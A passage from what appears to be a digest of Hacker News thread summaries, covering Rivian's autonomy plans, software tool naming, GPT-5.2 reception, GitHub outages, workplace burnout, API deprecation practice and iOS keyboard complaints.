  • Consensus: automotive lidars are designed as Class 1 (eye‑safe in normal use), but edge cases (e.g., very close exposure, many concurrent lidars, device failures) are not fully understood and certification transparency is limited.
  • Some worry about cumulative exposure (humans, animals, insects); others think it’s minor compared to sunlight and existing risks.

Market Reaction & Business Model

  • Commenters note Rivian’s stock dropped on the announcement; proposed reasons:
    • Market distrust that Rivian can execute custom silicon and Gen3 autonomy while still ramping R2.
    • Fear that current and near‑term vehicles are now implicitly “obsolete.”
  • Many expect autonomy to be sold as a subscription, likely bundled with insurance, citing:
    • Ongoing software/ops costs and liability.
    • Waymo data suggesting lower injury rates, creating room to capture insurance savings.
  • Others push back, preferring “you get what you buy” with no ongoing fees and warning about “subscription to life” dynamics.

CarPlay / Android Auto & Affordability

  • A large contingent says the main things they want from Rivian are:
    • CarPlay/Android Auto.
    • Lower prices.
  • Several would have bought a Rivian but instead chose other EVs largely due to CarPlay and better lease economics.
  • Rivian’s stated rationale for rejecting CarPlay (a fully integrated, consistent in‑house UX) is widely seen as control/lock‑in; some accept it if the native UX is good, others say it’s a deal breaker.

Autonomy Tech Landscape: Tesla, Waymo, Rivian

  • Strong disagreement over whether lidar‑heavy approaches (Waymo, Rivian roadmap) or camera‑only (Tesla) is the right bet.
  • Pro‑Waymo/lidar side:
    • Waymo already runs fully driverless paid rides in multiple cities; Tesla FSD still requires supervision.
    • Lidar simplifies depth, object detection, and robustness (night, fog, long tail scenarios).
  • Pro‑Tesla/camera side:
    • Remaining failures are mostly planning, not perception; if cameras solve depth well enough, lidar just adds cost/complexity.
    • Tesla’s vertically integrated, software‑defined architecture and scale give it better economics.
  • Some suggest Rivian’s best‑case niche is as a licensable autonomy platform for other OEMs if camera‑only stumbles and Waymo is viewed as too dominant or too “Google.”

Ownership vs Robotaxis vs Transit

  • One large subthread argues that many “reasons for autonomy” (skip driving, sleep, work en route, safer roads) are better solved by robust public transit, rail, biking, and fewer cars overall.
  • Others strongly prefer private vehicles as:
    • Mobile storage, private space, pet‑ and kid‑friendly, road‑trip and off‑road capable.
    • More convenient than Waymo/Uber, especially outside dense cores.
  • There’s concern that widespread autonomy could increase VMT, sprawl, energy use, and tire pollution, even as crash rates fall.

Insurance, Liability & Safety Engineering

  • Many expect autonomy and insurance to converge: OEM‑provided coverage tied to use of the self‑driving stack.
  • Questions raised:
    • How to handle catastrophic software failures affecting many vehicles at once?
    • Who is liable when autonomy fails (OEM vs driver), especially at L3+?
  • Some criticize over‑the‑air updates for safety‑critical systems (Tesla cited) and note that traditional automotive functional safety standards (ASIL, etc.) and regulatory evidence are still sparse in public.

Competition & Geopolitics

  • Multiple comments argue Rivian (and other US EV makers) survive partly due to US protectionism; Chinese OEMs are said to offer better‑specced, cheaper EVs with strong ADAS already.
  • Debate on whether Rivian’s R2/R3 can compete on price and features in Europe once BYD/Xiaomi and others expand further.

Programmers and software developers lost the plot on naming their tools

Embarrassing or opaque names

  • Many comments share examples of tools or packages whose names lead to porn, fetishes, or childish humor when searched, or that are awkward to say in professional settings.
  • This is used both to support the article’s claim (“this is embarrassing and off‑putting”) and to shrug it off as long-running hacker culture.

Descriptive vs whimsical naming

  • Some strongly agree with the article: names should convey function or domain (“http-request-validator” beats “zephyr”), especially for infrastructure, libraries, and internal tools.
  • Others argue descriptive names are overrated: you rarely infer true behavior from a name anyway; meaningful understanding always requires reading docs or code.
  • Several point out that historically praised names (awk, sed, grep, BASIC, Postgres, etc.) are not obvious to newcomers either, and mainly feel “good” because people already know them.

Renaming, scope creep, and identifiers

  • One camp: don’t use purpose‑agnostic names to pre‑optimize for scope creep; instead, name by function and accept the rare cost of a rename when direction changes.
  • Opposing camp: renaming anything widely shipped is extremely painful (packages, configs, docs, scripts, mental models), so pick a stable “ID-like” name from the start and let functionality evolve.
  • Popular compromise: internal code names (often whimsical) during development, then a more descriptive or marketable name once something is user-facing.

Comparisons to other fields

  • Multiple commenters challenge the article’s claim that other technical disciplines are more disciplined: they list playful or opaque names in biology, chemistry, physics, astronomy, medicine, the military, and engineering.
  • Others counter that those fields also have parallel systematic naming schemes (IUPAC, drug generics, engine model codes, astronomical catalog numbers) that software often lacks.

Searchability, acronyms, and collisions

  • Whimsical, unique names can be excellent for search; generic names like “auth-service” or “http-client” are hard to Google and ambiguous in conversation.
  • Conversely, overloaded common words (e.g., “combine”, “windows”, “nat”, “webhooks”) or generic library names can create confusion and name collisions across ecosystems.
  • Heavy use of acronyms and initialisms in “serious” naming is cited as another source of cognitive load; people often end up memorizing arbitrary letter salads instead of clear concepts.

Culture, professionalism, and fun

  • Some see silly names as unprofessional or as adding “cognitive tax”.
  • Others defend whimsy as part of engineering culture, argue that many serious sciences do the same, and say that joy, memorability, and branding are legitimate goals alongside clarity.

GPT-5.2

Model identity, training, and scaling

  • Many commenters doubt GPT‑5.2 is a genuinely new base model, suspecting continued pretraining on GPT‑4/4o weights plus more aggressive reasoning/RL rather than a full fresh run.
  • The new August 2025 knowledge cutoff is seen as evidence of either incremental pretraining or a late, rushed run triggered by Google’s Gemini 3 “code red.”
  • Discussion of a broader slowdown in pure scaling since GPT‑4: most frontier models are now improving mainly through reasoning, RL, and training data quality rather than huge parameter jumps. Hardware limits (GPU memory, MoE routing, interconnect) and datacenter constraints are a recurring theme.

Benchmarks, ARC‑AGI, and accusations of gaming

  • The big ARC‑AGI v2 jump (into low‑50% range) is widely noted; some call it “insane” and encouraging for generalization, others see it as a sign benchmarks are being explicitly trained on.
  • Debate over ARC‑AGI itself: some treat it like a robust IQ‑style test for reasoning; others argue it’s overfittable, vision‑heavy, or analogous to being good at contest math rather than “intelligence.”
  • OpenAI’s homegrown GDPval benchmark draws skepticism as an in‑house metric. There’s concern about cherry‑picked cross‑lab comparisons (e.g., omitting SWE‑Bench cases where rivals win).
  • Growing sentiment that benchmark saturation makes headline numbers less meaningful than long‑horizon, real‑world task performance.

Pricing, Pro tier, and economics

  • API prices for 5.2 are ~40% higher than 5.1; many question calling this “slight.” Some note it’s still cheaper than top Anthropic/Google tiers, others see this as the start of enshittification.
  • GPT‑5.2 Pro reasoning is viewed as “priced not to be used” except by highly price‑insensitive customers or for marketing benchmarks; reports of single prompts costing double‑digit dollars.
  • A few point out that reasoning on difficult benchmarks (e.g., ARC‑AGI) is dramatically cheaper than earlier o3‑style models, so “intelligence per dollar” has still improved.

Capabilities and UX: coding, vision, and spreadsheets

  • Coding: mixed experiences. Some find Codex + 5.x Thinking excellent for complex debugging and refactors; others still prefer Claude Code or Gemini 3 for reliability and speed, especially for UI work.
  • Vision remains notably subhuman. OpenAI’s own motherboard demo is criticized for mislabeling components; OpenAI staff acknowledge the example shows “better, not perfect” vision.
  • Spreadsheet and finance tasks (e.g., multi‑statement models, SEC parsing) are a standout positive anecdote; some see this as serious pressure on junior analyst roles.
  • Context handling: 400k API context and new “compaction” are praised, but ChatGPT web/app limits remain lower, and very long contexts still degrade quality.

Safety, hallucinations, and trust

  • Third‑party red‑teaming shows high refusal rates for naive harmful prompts but much weaker resistance under jailbreaks, especially around impersonation, harassment, and disinformation.
  • Many users remain frustrated by confident hallucinations in domains like electronics, physics, and niche technical details, arguing that better grounding and calibrated uncertainty matter more now than raw benchmark gains.

Competition and user migration

  • A sizable minority say they’ve switched primary usage to Gemini 3 or Claude (especially for coding and search‑heavy tasks), citing better day‑to‑day feel despite OpenAI’s benchmark claims.
  • Others still prefer ChatGPT for voice, overall polish, or reliability of deep reasoning, but agree that meaningful differentiation now lies more in UX, tools, and grounding than in another small reasoning bump.

Days since last GitHub incident

Overall reaction to GitHub instability

  • Several users noticed the outage before the official status page, citing failed releases, Actions failures, and “unicorn” error pages.
  • Some now reflexively assume CI failures are GitHub’s fault rather than their own, and argue stability should be prioritized over AI features.
  • Others feel outages are frequent enough that internal discussions have begun about moving away from Actions, Packages, or GitHub entirely, describing the platform as “decaying.”

The “days since last incident” site and humor

  • Many found the site funny and perfectly minimal, with some amused that it works even offline due to being static.
  • Others criticized it as low-effort and wished for a more elaborate meme (physical-style accident sign, octocat gags, “days without accident” templates, AI jokes).
  • A few users complained about design/usability (text too small, looks blank on phones).

Reliability, “incidents,” and SLAs

  • Some argue the counter is misleading because minor or obscure component outages reset it; others respond that what’s “trivial” varies by user.
  • Discussion touches on uptime expectations: not everyone needs “five nines,” but even short outages can be painful when they block CI, container registry pulls, or payments.
  • Users point out registries and artifact services can be single points of failure, even if read-only mirrors are conceptually simple.

Alternatives, mirroring, and decentralization

  • Suggestions include GitLab, self-hosted GitHub Enterprise Server, mirrors for dependencies (e.g., via Nixpkgs), and decentralized/p2p forges like radicle.
  • Some say moving off GitHub has high friction due to network effects and mindshare; others share negative GitLab experiences or say uptime is similar.
  • Mirroring source is seen as practical; replicating Actions, issues, registries, or Copilot is harder.

AI features and local vs cloud setups

  • One user describes heavy reliance on GitHub’s agents/Copilot for reviving old projects and is frustrated that this increases exposure to downtime.
  • Self-hosted GitHub Enterprise is mentioned but noted to lack Copilot APIs.
  • Multiple commenters explain that local LLMs still lag hosted “frontier” models; local hosting is framed as useful mainly for privacy/hobby use, not as a seamless Copilot replacement.
  • Discussion branches into hardware (Apple Silicon vs NVIDIA boxes) and building one’s own agent/tooling stack, with some arguing that investing in custom tools has high long-term ROI.

Quality issues: Actions and UX

  • Users list odd GitHub Actions behaviors (stuck jobs, inconsistent status, phantom PR badges) as evidence of brittle internals.
  • There is broader criticism of Microsoft-era quality and a sense that “AI everywhere” has crowded out core product polish.
  • Separate complaints focus on unremovable crypto spam notifications; workarounds via the GitHub CLI and a recent backend fix are shared.

IPv6 and networking

  • Some argue GitHub’s lack of IPv6 in 2025 should count as a permanent “incident”; others say residential IPv6 penetration is still too low for it to be business-critical.
  • Brief side discussion covers ISPs, router firewalls, and cloud providers that price IPv4 separately from IPv6.

Things I want to say to my boss

Work, burnout, and disengagement

  • Many see modern white‑collar work as inhumane, with burnout framed as an organizational math problem (too much work, too few people) rather than an individual weakness.
  • Others push back, arguing work is inherently about survival and cooperation, and office work isn’t intrinsically “hard” compared to historical labor struggles.
  • Several describe responding by “withdrawing” or “quiet quitting”: doing competent work but no longer giving discretionary effort or emotional investment.
  • Some note cultural contrasts: in parts of Europe burnout is treated as a system failure or health issue, while in the US it’s often moralized as commitment or lack thereof.

Profit, managers, and incentives

  • A large subthread blames “profit at any cost,” short‑termism, and the principal–agent problem: executives and boards optimize quarterly metrics and exits, not long‑term value or people.
  • The rise of the professional managerial/MBA culture is cited as having devalued domain expertise and people, treating workers as interchangeable “resources.”
  • Others argue the root problem is average or weak managers under pressure, not profit‑seeking per se; good profit optimization should align with stable, healthy teams.

Performative care vs real leadership

  • The most resonant theme is “performative care”: therapy‑style check‑ins, engagement surveys, and “shielding” rhetoric without actual support, staffing, or honest communication.
  • Commenters emphasize that people quickly detect this gap between words and actions, and it erodes trust and loyalty.
  • Some share experiences with abusive or volatile bosses and long‑lasting mental‑health damage; others recount “soft‑skills obsessed” managers whose teams accomplished little and ran out of money.

Engineers’ shifting attitudes and generational tension

  • Older engineers recall entering the field for love of the craft and resent newer “careerist” or “resume‑driven” behavior (e.g., over‑engineering to pad resumes).
  • Others counter that with precarious jobs, high costs of living, and frequent layoffs, focusing on pay and mobility is rational self‑defense. Trying to care deeply often leads to burnout or being labeled a problem.

Management, hierarchy, and structural responses

  • Some argue most engineering management and executive layers are wasteful; teams need clear goals and autonomy more than “leadership theater.”
  • Others stress that good management and genuine care are hard to scale; character (doing the right thing despite personal risk) is rare.
  • Unionization is repeatedly proposed as the only proven, scalable check on abusive or indifferent leadership, though many in the industry still resist it.

Meta: authorship and style

  • Several speculate the essay is AI‑written due to repetitive “not X but Y” constructions; others dismiss this as unhelpful and often ill‑informed, noting the style predates AI and matches common human rhetoric.

Deprecate like you mean it

Reaction to the article’s proposal (random wrong results)

  • Overwhelming consensus that intentionally returning wrong or intermittent results from deprecated APIs is “profoundly awful,” unethical, and indistinguishable from sabotage.
  • Main objection: it creates flappy, non-deterministic bugs that are the hardest to debug and destroys confidence in CI and systems.
  • Several commenters say if you want to break an API, do it explicitly and predictably, not via hidden behavior changes.
  • Many initially missed that the article was sarcastic; the author later added a clarifying note that “it’s better to leave the warts,” and that warnings are weak but intentional breakage is worse.

What people consider good deprecation practice

  • Use clear timelines and channels: deprecate with warnings, publish dates/versions for removal, then remove.
  • Prefer breaking changes only in major versions (true SemVer) and avoid breaking in minor releases, especially in core libs like urllib, NumPy, etc.
  • Suggested flows:
    • Warnings → compiler/linter warnings → compiler/linter errors with trivial escape hatch → full removal.
    • Hard errors with explicit, ugly config/env flags to temporarily re-enable deprecated behavior.
  • Strong dislike for “permanent deprecation” without ever removing, but also for projects that threaten deprecation then never follow through.

Backwards compatibility vs progress

  • One camp: bitrot is mostly a series of conscious backward-incompatible changes; old software “should” still run; API churn is negative value and should be extremely rare.
  • Other camp: some breakage is necessary for security, maintainability, or performance; Windows, Python 2→3, .NET, Java, etc., show that trade-offs are inevitable.
  • Disagreement over whether all progress can preserve backward compatibility; some claim yes in principle, others call that naïve.

Static typing, tooling, and incentives

  • Argument that static typing and easy refactoring can encourage maintainers to introduce breaking changes (“it was trivial for me, so it’s trivial for users”).
  • Counter-argument: static typing helps enforce contracts and detect breakages earlier; the real issues are culture and project philosophy, not typing.
  • Several note that tools and warnings exist, but many teams ignore warnings and don’t pin dependencies, effectively choosing to absorb breakages.

Alternative pressure mechanisms

  • Proposed—but controversial—ideas:
    • Gradually adding latency (sleep) to deprecated paths, sometimes exponentially, to create a business incentive to migrate.
    • Brownouts (temporary, clearly messaged outages) or HTTP 426-style hard failures with upgrade instructions.
    • Charging for legacy API support or offering paid contracts/LTS instead of silent rug-pulls.

Ethics and user expectations

  • Strong view that published APIs are implicit long-term promises; users reasonably expect them to keep working.
  • Others stress that contracts and costs matter: nothing can be supported forever, but termination should be explicit, predictable, and clearly communicated.

iPhone Typos? It's Not Just You – The iOS Keyboard Is Broken [video]

Perceived Keyboard Regression

  • Many report a sharp increase in typos in recent iOS versions, especially after the “glass”/iOS 26 update, on both small (SE, mini) and large phones.
  • Users describe keys visually highlighting correctly while nearby letters are inserted, making them question their own motor skills or aging.
  • Some note this didn’t happen on early iPhones or even a 2007 iPod touch, which they recall as nearly error‑free.

Autocorrect, Prediction & “Look‑Behind” Editing

  • Aggressive “look‑behind” correction is a major source of anger: the OS silently changes words several tokens back after you type a new one.
  • Autocorrect often turns correct words into nonsensical or rare ones, and can fight repeated attempts to enter the desired word.
  • A long‑standing bug where words get duplicated (“duplicateduplicate”) still appears for some.
  • Safety/content filters: people struggle to type phrases like “kill myself,” profanity, or certain racial terms, while the system happily suggests more offensive alternatives in other languages.

Slide‑to‑Type, Hitboxes & Possible Technical Causes

  • One camp blames slide‑to‑type: with it enabled, hitboxes are dynamically resized and presses are registered on finger‑up, so small slides can cause wrong letters despite the popup showing the “right” key.
  • Others with slide‑to‑type disabled still see issues and point out the video shows “U” highlighted while a different character is committed, suggesting a deeper bug.
  • Some mention invisible hitbox reshaping and prediction based on common word sequences, which may now be tuned too aggressively.

Editing & Cursor Control

  • Editing text is widely described as “a nightmare”: getting the cursor into the middle of a word, dismissing selection popups, or undoing a wrong correction is slow and error‑prone.
  • The space‑bar cursor‑move gesture helps some, but fails in numeric/URL fields and can itself misplace the cursor.

Comparisons, Alternatives & Multilingual Pain

  • Many who moved from Android praise older Android keyboards (Swype, early SwiftKey, Gboard on Pixels) as far superior, especially for swipe and next‑word prediction.
  • Others say Android keyboards have also degraded in recent years, with similar overzealous ML and look‑behind behavior.
  • Multilingual users on both platforms report severe regressions: the keyboard latches onto the “wrong” language after a single foreign word, splits compounds, and never seems to learn domain‑specific or community slang.

Workarounds, Third‑Party Keyboards & Trust

  • Common coping strategies: disabling autocorrect/prediction, turning off slide‑to‑type, using dictation, external Bluetooth keyboards, or niche third‑party keyboards (T9‑style, swipe‑only, open source).
  • On iOS, third‑party keyboards are hampered by platform limits, stability issues, and privacy concerns (fear of keylogging or cloud training), though some run without “full access.”

Broader iOS / Software‑Quality Concerns

  • The keyboard is framed as one example of a wider iOS decline: UI jank, Safari rendering bugs, notification confusion, call and GPS issues, awkward new layouts (Phone, Safari, Alarms), and “glass” visuals that hurt usability.
  • Several threads question modern software incentives: focus on new features, design fashion, and AI overlays rather than fixing regressions; lack of meaningful user choice due to forced updates, app stores, and ecosystem lock‑in.
  • Some lament the shift from human‑factors/HCI to “UX” driven by business metrics, A/B tests, and dark patterns, with quality and user control steadily eroded.